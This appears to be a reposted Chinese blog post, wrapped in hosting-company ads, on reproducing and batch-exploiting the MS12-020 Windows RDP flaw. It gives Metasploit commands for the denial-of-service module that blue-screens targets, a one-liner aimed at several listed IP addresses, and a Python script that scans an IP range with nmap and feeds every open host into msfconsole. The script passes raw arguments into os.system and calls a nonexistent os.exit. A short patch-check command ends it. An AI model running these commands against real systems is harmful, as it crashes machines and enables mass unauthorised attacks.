MS12-020漏洞复现及自动化批量利用-创新互联
漏洞描述
Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)
影响目标
Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2
msfpayload利用
msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost
run
此pyload仅支持单目标。
成都服务器托管,创新互联提供包括服务器租用、成都服务器托管、带宽租用、云主机、机柜租用、主机租用托管、CDN网站加速、域名与空间等业务的一体化完整服务。电话咨询:13518219792通过msfconsole快速启动
msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"
通过bash脚本批量生成检测脚本(nmap-port2ip.py)
#encoding:utf-8
import xml.sax
import sys
import os
class MovieHandler( xml.sax.ContentHandler ):
def __init__(self, filterport=None):
self.CurrentData = ""
self.port=filterport
self.data = ""
self.datas=[]
# 元素开始事件处理
def startElement(self, tag, attributes):
self.CurrentData = tag
if tag == "address":
self.data=attributes["addr"]
# 元素结束事件处理
def endElement(self, tag):
if self.CurrentData == "address":
self.datas.append(self.data)
self.data=""
self.CurrentData = ""
class Gather(object):
def __init__(self, filterport=None):
# 创建一个 XMLReader
self.parser = xml.sax.make_parser()
# turn off namepsaces
self.parser.setFeature(xml.sax.handler.feature_namespaces, 0)
# 重写 ContextHandler
self.Handler = MovieHandler(filterport)
self.parser.setContentHandler( self.Handler )
def run(self, port):
self.Handler.datas=[]
self.parser.parse(port+".xml")
print(self.Handler.datas)
def get_ans(self):
return self.Handler.datas
if __name__ == "__main__":
if len(sys.argv) !=3:
os.exit()
os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml")
g = Gather()
g.run(sys.argv[2])
# create cmd
cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;'
ips = g.get_ans()
if len(ips)>0:
for ip in g.get_ans():
cmd += "set rhosts "+ip+";run;"
cmd += 'exit;"'
os.system("msfconsole -x " + cmd)
# 使用方法
python nmap-port2ip.py
# 功能:针对某种服务的漏洞对指定IP段的所有主机进行检测,获取可能存在问题的主机IP,并调用对应的Msf Payload进行利用尝试。
# ip可支持单一IP、CIDR形式IP、10.129.1.1-154等几种,格式与nmap一致
# port仅支持单端口
漏洞补丁检测
systeminfo | find /i "KB2621440"
如果存在结果如下,证明已打补丁,否则,需要打对应的补丁。
Windows Server 2003补丁
参考文章
- 微软MS12-020
另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。
网站栏目:MS12-020漏洞复现及自动化批量利用-创新互联
标题URL:http://azwzsj.com/article/gidhp.html